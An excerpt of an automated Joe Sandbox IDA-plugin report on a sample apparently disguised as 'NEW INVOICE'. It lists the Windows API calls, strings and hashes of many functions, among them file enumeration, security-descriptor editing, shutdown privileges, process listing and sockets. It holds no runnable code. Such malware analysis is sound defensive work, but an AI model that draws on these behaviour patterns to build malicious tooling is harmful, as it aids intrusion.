                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                    • __wsplitpath.LIBCMT ref: 004038B2
                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                    • _wcscpy.LIBCMT ref: 004038C7
                                                                                    • _wcscat.LIBCMT ref: 004038DC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                    • _wcscpy.LIBCMT ref: 004039C2
                                                                                    • _wcslen.LIBCMT ref: 00403A53
                                                                                    • _wcslen.LIBCMT ref: 00403AAA
                                                                                    Strings
                                                                                    • _, xrefs: 00403B48
                                                                                    • Unterminated string, xrefs: 0042B9BA
                                                                                    • Error opening the file, xrefs: 0042B8AC
                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                    • API String ID: 4115725249-188983378
                                                                                    • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                    • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                    • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                    • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                    • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                    • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                    • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                    • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1409584000-438819550
                                                                                    • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                    • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                    • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                    • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timetime$Sleep
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 4176159691-3405671355
                                                                                    • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                    • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                    • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                    • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                    • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                      • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 2640511053-438819550
                                                                                    • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                    • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                    • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                    • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                    APIs
                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                      • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                      • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                    • _memset.LIBCMT ref: 00445E61
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                    • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                    • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                    • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                    • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3490752873-0
                                                                                    • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                    • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                    • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                    • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                    • _memset.LIBCMT ref: 0047AB7C
                                                                                    • _wcslen.LIBCMT ref: 0047AC68
                                                                                    • _memset.LIBCMT ref: 0047ACCD
                                                                                    • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                    • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 0047AD84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1588287285-2785691316
                                                                                    • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                    • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                    • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                    • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                    • GetLastError.KERNEL32 ref: 00436504
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 2938487562-3733053543
                                                                                    • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                    • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                    • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                    • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 00436162
                                                                                    • __swprintf.LIBCMT ref: 00436176
                                                                                      • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                    • __wcsicoll.LIBCMT ref: 00436185
                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                    • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                    • LockResource.KERNEL32(?), ref: 004361FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                    • String ID:
                                                                                    • API String ID: 2406429042-0
                                                                                    • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                    • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                    • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                    • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                    • GetLastError.KERNEL32 ref: 0045D59D
                                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                    • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                    • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                    • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                    APIs
                                                                                    • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                    • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • _wcslen.LIBCMT ref: 0047AE18
                                                                                    • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                    • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                    • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                    • String ID: HH
                                                                                    • API String ID: 1915432386-2761332787
                                                                                    • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                    • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                    • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                    • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                    • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2609815416-0
                                                                                    • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                    • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                    • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                    • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                    • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                    • __wsplitpath.LIBCMT ref: 004370A5
                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                    • _wcscat.LIBCMT ref: 004370BA
                                                                                    • __wcsicoll.LIBCMT ref: 004370C8
                                                                                    • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 2547909840-0
                                                                                    • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                    • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                    • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                    • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                    • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                    • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
